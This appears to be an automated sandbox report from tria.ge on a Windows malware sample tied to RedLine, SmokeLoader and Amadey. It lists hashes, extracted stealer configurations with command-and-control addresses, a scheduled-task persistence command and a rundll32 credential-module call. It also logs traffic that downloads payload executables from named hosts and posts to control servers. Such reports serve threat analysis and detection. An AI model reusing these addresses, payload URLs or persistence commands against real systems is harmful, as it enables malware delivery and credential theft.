Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
27/10/2022, 20:03 UTC
Static task
static1
Behavioral task
behavioral1
Sample
e6d6640c7d22256c6725b096996a05ca556b97dd50236b39edf443fc1314e8c4.exe
Resource
win10v2004-20220901-en
General
-
Target
e6d6640c7d22256c6725b096996a05ca556b97dd50236b39edf443fc1314e8c4.exe
-
Size
255KB
-
MD5
c7170f75d5580d9b214ed54a5d7ccc74
-
SHA1
bb0e014cdaf3b0fb11ebc080c2a5b2944a856352
-
SHA256
e6d6640c7d22256c6725b096996a05ca556b97dd50236b39edf443fc1314e8c4
-
SHA512
21b462c299f2a645cdc6e0b7e11f1bdc32db48129de63ecd098b4251647a62dec30ddd50b84a9214bb160ab06f29a3510c8d06c80253cdc632a9d58dd286a86b
-
SSDEEP
3072:rkXOGq6ZZxc+TMnq54CBMxSXZUWCA9I+bO0fAilcpRWKxhl0Kv:MhqG45NUXZAAu2OUIRWKxj0
Malware Config
Extracted
redline
slovarik15btc
78.153.144.3:2510
-
auth_value
bfedad55292538ad3edd07ac95ad8952
Extracted
redline
Google2
167.235.71.14:20469
-
auth_value
fb274d9691235ba015830da570a13578
Signatures
-
Detect Amadey credential stealer module 4 IoCs
resource yara_rule behavioral1/files/0x0004000000021834-229.dat amadey_cred_module behavioral1/files/0x0004000000021834-230.dat amadey_cred_module behavioral1/memory/3320-232-0x0000000000810000-0x0000000000834000-memory.dmp amadey_cred_module behavioral1/files/0x0004000000021834-231.dat amadey_cred_module -
Detects Smokeloader packer 1 IoCs
resource yara_rule behavioral1/memory/2260-133-0x0000000002D90000-0x0000000002D99000-memory.dmp family_smokeloader -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral1/memory/1672-140-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral1/memory/2876-145-0x0000000000420000-0x00000000004D8000-memory.dmp family_redline behavioral1/memory/2648-152-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral1/memory/3132-158-0x0000000000B50000-0x0000000000C08000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 42 3320 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
pid Process 2876 1424.exe 3132 17AF.exe 2728 204B.exe 3152 232B.exe 1596 rovwer.exe 2820 rovwer.exe 3396 rovwer.exe -
resource yara_rule behavioral1/files/0x0002000000022df2-161.dat upx behavioral1/memory/2728-162-0x00007FF6C5FE0000-0x00007FF6C6843000-memory.dmp upx behavioral1/memory/2728-209-0x00007FF6C5FE0000-0x00007FF6C6843000-memory.dmp upx behavioral1/memory/2728-226-0x00007FF6C5FE0000-0x00007FF6C6843000-memory.dmp upx -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 232B.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation rovwer.exe -
Loads dropped DLL 2 IoCs
pid Process 3320 rundll32.exe 3320 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2876 set thread context of 1672 2876 1424.exe 90 PID 3132 set thread context of 2648 3132 17AF.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 3656 3152 WerFault.exe 95 1320 2820 WerFault.exe 111 4832 3396 WerFault.exe 117 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e6d6640c7d22256c6725b096996a05ca556b97dd50236b39edf443fc1314e8c4.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e6d6640c7d22256c6725b096996a05ca556b97dd50236b39edf443fc1314e8c4.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e6d6640c7d22256c6725b096996a05ca556b97dd50236b39edf443fc1314e8c4.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2344 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2260 e6d6640c7d22256c6725b096996a05ca556b97dd50236b39edf443fc1314e8c4.exe 2260 e6d6640c7d22256c6725b096996a05ca556b97dd50236b39edf443fc1314e8c4.exe 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1040 Process not Found -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 2260 e6d6640c7d22256c6725b096996a05ca556b97dd50236b39edf443fc1314e8c4.exe 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found 1040 Process not Found -
Suspicious use of AdjustPrivilegeToken 33 IoCs
description pid Process Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeDebugPrivilege 2648 RegSvcs.exe Token: SeDebugPrivilege 1672 RegSvcs.exe Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeDebugPrivilege 2388 powershell.exe Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found Token: SeShutdownPrivilege 1040 Process not Found Token: SeCreatePagefilePrivilege 1040 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1040 wrote to memory of 2876 1040 Process not Found 89 PID 1040 wrote to memory of 2876 1040 Process not Found 89 PID 1040 wrote to memory of 2876 1040 Process not Found 89 PID 2876 wrote to memory of 1672 2876 1424.exe 90 PID 2876 wrote to memory of 1672 2876 1424.exe 90 PID 2876 wrote to memory of 1672 2876 1424.exe 90 PID 2876 wrote to memory of 1672 2876 1424.exe 90 PID 2876 wrote to memory of 1672 2876 1424.exe 90 PID 1040 wrote to memory of 3132 1040 Process not Found 91 PID 1040 wrote to memory of 3132 1040 Process not Found 91 PID 1040 wrote to memory of 3132 1040 Process not Found 91 PID 3132 wrote to memory of 2648 3132 17AF.exe 92 PID 3132 wrote to memory of 2648 3132 17AF.exe 92 PID 3132 wrote to memory of 2648 3132 17AF.exe 92 PID 3132 wrote to memory of 2648 3132 17AF.exe 92 PID 3132 wrote to memory of 2648 3132 17AF.exe 92 PID 1040 wrote to memory of 2728 1040 Process not Found 94 PID 1040 wrote to memory of 2728 1040 Process not Found 94 PID 1040 wrote to memory of 3152 1040 Process not Found 95 PID 1040 wrote to memory of 3152 1040 Process not Found 95 PID 1040 wrote to memory of 3152 1040 Process not Found 95 PID 1040 wrote to memory of 3376 1040 Process not Found 96 PID 1040 wrote to memory of 3376 1040 Process not Found 96 PID 1040 wrote to memory of 3376 1040 Process not Found 96 PID 1040 wrote to memory of 3376 1040 Process not Found 96 PID 1040 wrote to memory of 4004 1040 Process not Found 97 PID 1040 wrote to memory of 4004 1040 Process not Found 97 PID 1040 wrote to memory of 4004 1040 Process not Found 97 PID 1040 wrote to memory of 4708 1040 Process not Found 98 PID 1040 wrote to memory of 4708 1040 Process not Found 98 PID 1040 wrote to memory of 4708 1040 Process not Found 98 PID 1040 wrote to memory of 4708 1040 Process not Found 98 PID 3152 wrote to memory of 1596 3152 232B.exe 99 PID 3152 wrote to memory of 1596 3152 232B.exe 99 PID 3152 wrote to memory of 1596 3152 232B.exe 99 PID 1040 wrote to memory of 4876 1040 Process not Found 101 PID 1040 wrote to memory of 4876 1040 Process not Found 101 PID 1040 wrote to memory of 4876 1040 Process not Found 101 PID 1040 wrote to memory of 2736 1040 Process not Found 104 PID 1040 wrote to memory of 2736 1040 Process not Found 104 PID 1040 wrote to memory of 2736 1040 Process not Found 104 PID 1040 wrote to memory of 2736 1040 Process not Found 104 PID 1040 wrote to memory of 3696 1040 Process not Found 105 PID 1040 wrote to memory of 3696 1040 Process not Found 105 PID 1040 wrote to memory of 3696 1040 Process not Found 105 PID 1040 wrote to memory of 3696 1040 Process not Found 105 PID 1040 wrote to memory of 1332 1040 Process not Found 106 PID 1040 wrote to memory of 1332 1040 Process not Found 106 PID 1040 wrote to memory of 1332 1040 Process not Found 106 PID 1040 wrote to memory of 1332 1040 Process not Found 106 PID 1040 wrote to memory of 4868 1040 Process not Found 107 PID 1040 wrote to memory of 4868 1040 Process not Found 107 PID 1040 wrote to memory of 4868 1040 Process not Found 107 PID 1040 wrote to memory of 3592 1040 Process not Found 108 PID 1040 wrote to memory of 3592 1040 Process not Found 108 PID 1040 wrote to memory of 3592 1040 Process not Found 108 PID 1040 wrote to memory of 3592 1040 Process not Found 108 PID 1596 wrote to memory of 2344 1596 rovwer.exe 109 PID 1596 wrote to memory of 2344 1596 rovwer.exe 109 PID 1596 wrote to memory of 2344 1596 rovwer.exe 109 PID 2728 wrote to memory of 2388 2728 204B.exe 112 PID 2728 wrote to memory of 2388 2728 204B.exe 112 PID 1596 wrote to memory of 3320 1596 rovwer.exe 116 PID 1596 wrote to memory of 3320 1596 rovwer.exe 116 -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e6d6640c7d22256c6725b096996a05ca556b97dd50236b39edf443fc1314e8c4.exe"C:\Users\Admin\AppData\Local\Temp\e6d6640c7d22256c6725b096996a05ca556b97dd50236b39edf443fc1314e8c4.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2260
-
C:\Users\Admin\AppData\Local\Temp\1424.exeC:\Users\Admin\AppData\Local\Temp\1424.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Users\Admin\AppData\Local\Temp\17AF.exeC:\Users\Admin\AppData\Local\Temp\17AF.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Users\Admin\AppData\Local\Temp\204B.exeC:\Users\Admin\AppData\Local\Temp\204B.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Users\Admin\AppData\Local\Temp\232B.exeC:\Users\Admin\AppData\Local\Temp\232B.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exe"C:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exe" /F3⤵
- Creates scheduled task(s)
PID:2344
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80b59841e5c623\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- outlook_win_path
PID:3320
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 9042⤵
- Program crash
PID:3656
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3376
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4004
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4708
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4876
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3152 -ip 31521⤵PID:4192
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2736
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3696
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1332
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4868
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3592
-
C:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exeC:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exe1⤵
- Executes dropped EXE
PID:2820 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 3122⤵
- Program crash
PID:1320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2820 -ip 28201⤵PID:2176
-
C:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exeC:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exe1⤵
- Executes dropped EXE
PID:3396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 3122⤵
- Program crash
PID:4832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3396 -ip 33961⤵PID:3296
Network
-
Remote address:8.8.8.8:53Requesto36fafs3sn6xou.comIN AResponseo36fafs3sn6xou.comIN A34.65.131.183
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://twyqlyvloh.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 309
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 404 Not Found
server: Apache/2.4.41 (Ubuntu)
transfer-encoding: chunked
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://iiqwt.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 321
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 200 OK
server: Apache/2.4.41 (Ubuntu)
content-length: 0
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uxkgvwtbno.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 360
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 200 OK
server: Apache/2.4.41 (Ubuntu)
content-length: 0
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bbvtd.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 211
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 404 Not Found
server: Apache/2.4.41 (Ubuntu)
content-length: 406
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://afytjinpo.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 285
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 404 Not Found
server: Apache/2.4.41 (Ubuntu)
content-length: 59
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ynbxuwnw.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 113
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 404 Not Found
server: Apache/2.4.41 (Ubuntu)
content-length: 406
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xsdahma.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 152
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 404 Not Found
server: Apache/2.4.41 (Ubuntu)
content-length: 52
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yodbjhbn.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 227
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 404 Not Found
server: Apache/2.4.41 (Ubuntu)
content-length: 406
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gcrqwo.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 364
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 404 Not Found
server: Apache/2.4.41 (Ubuntu)
content-length: 52
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dbmsf.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 139
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 404 Not Found
server: Apache/2.4.41 (Ubuntu)
content-length: 406
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cftryg.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 296
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 200 OK
server: Apache/2.4.41 (Ubuntu)
content-length: 0
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mandrmv.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 235
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 404 Not Found
server: Apache/2.4.41 (Ubuntu)
content-length: 45
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://swcnnxlw.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 221
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 404 Not Found
server: Apache/2.4.41 (Ubuntu)
content-length: 406
content-type: text/html; charset=utf-8
-
Remote address:34.65.131.183:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://amrnbw.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 139
Host: o36fafs3sn6xou.com
ResponseHTTP/1.1 404 Not Found
server: Apache/2.4.41 (Ubuntu)
content-length: 406
content-type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Requestthehumancondition.comIN AResponsethehumancondition.comIN A50.87.226.149
-
Remote address:50.87.226.149:443RequestGET /slovarik15btc.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: thehumancondition.com
ResponseHTTP/1.1 200 OK
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Thu, 27 Oct 2022 20:01:49 GMT
Accept-Ranges: bytes
Content-Length: 741376
host-header: d3AuYmx1ZWhvc3QuY29t
Keep-Alive: timeout=5, max=75
Content-Type: application/x-msdownload
-
Remote address:50.87.226.149:443RequestGET /chaska.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: thehumancondition.com
ResponseHTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 27 Oct 2022 20:00:48 GMT
Accept-Ranges: bytes
Content-Length: 741376
host-header: d3AuYmx1ZWhvc3QuY29t
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
Content-Type: application/x-msdownload
-
Remote address:8.8.8.8:53Requesttransfer.shIN AResponsetransfer.shIN A144.76.136.153
-
Remote address:144.76.136.153:443RequestGET /get/IIAGpE/onyxx.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: transfer.sh
ResponseHTTP/1.1 200 OK
Date: Thu, 27 Oct 2022 20:03:45 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 2674176
Connection: keep-alive
Cache-Control: no-store
Content-Disposition: attachment; filename="onyxx.exe"
Retry-After: Thu, 27 Oct 2022 22:03:45 GMT
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 127.0.0.1,154.61.71.51,154.61.71.51
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1666901025
X-Remaining-Days: n/a
X-Remaining-Downloads: n/a
X-Served-By: Proudly served by DutchCoders
Strict-Transport-Security: max-age=63072000
-
Remote address:77.73.134.250:80RequestGET /vr/movie.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.73.134.250
ResponseHTTP/1.1 200 OK
Date: Thu, 27 Oct 2022 20:03:46 GMT
Content-Type: application/octet-stream
Content-Length: 295424
Last-Modified: Thu, 27 Oct 2022 20:00:02 GMT
Connection: keep-alive
ETag: "635ae342-48200"
Accept-Ranges: bytes
-
Remote address:176.113.115.201:80RequestPOST /3g4mn5s/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.201
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Thu, 27 Oct 2022 20:03:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:176.113.115.201:80RequestGET /3g4mn5s/Plugins/cred64.dll HTTP/1.1
Host: 176.113.115.201
ResponseHTTP/1.1 200 OK
Date: Thu, 27 Oct 2022 20:04:46 GMT
Content-Type: application/octet-stream
Content-Length: 129024
Last-Modified: Wed, 14 Sep 2022 13:44:54 GMT
Connection: keep-alive
ETag: "6321dad6-1f800"
Accept-Ranges: bytes
-
Remote address:176.113.115.201:80RequestPOST /3g4mn5s/index.php HTTP/1.1
Host: 176.113.115.201
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
ResponseHTTP/1.1 200 OK
Date: Thu, 27 Oct 2022 20:04:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
322 B 7
-
11.6kB 173.0kB 101 171
HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
404HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
200HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
200HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
404HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
404HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
404HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
404HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
404HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
404HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
404HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
200HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
404HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
404HTTP Request
POST http://o36fafs3sn6xou.com/HTTP Response
404 -
43.0kB 1.6MB 745 1195
HTTP Request
GET https://thehumancondition.com/slovarik15btc.exeHTTP Response
200HTTP Request
GET https://thehumancondition.com/chaska.exeHTTP Response
200 -
47.3kB 2.8MB 1017 1991
HTTP Request
GET https://transfer.sh/get/IIAGpE/onyxx.exeHTTP Response
200 -
3.8MB 30.8kB 2554 615
-
3.8MB 56.3kB 2896 1244
-
5.7kB 305.0kB 120 233
HTTP Request
GET http://77.73.134.250/vr/movie.exeHTTP Response
200 -
322 B 7
-
4.9kB 133.5kB 101 100
HTTP Request
POST http://176.113.115.201/3g4mn5s/index.phpHTTP Response
200HTTP Request
GET http://176.113.115.201/3g4mn5s/Plugins/cred64.dllHTTP Response
200 -
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
379 B 385 B 5 4
HTTP Request
POST http://176.113.115.201/3g4mn5s/index.phpHTTP Response
200 -
-
-
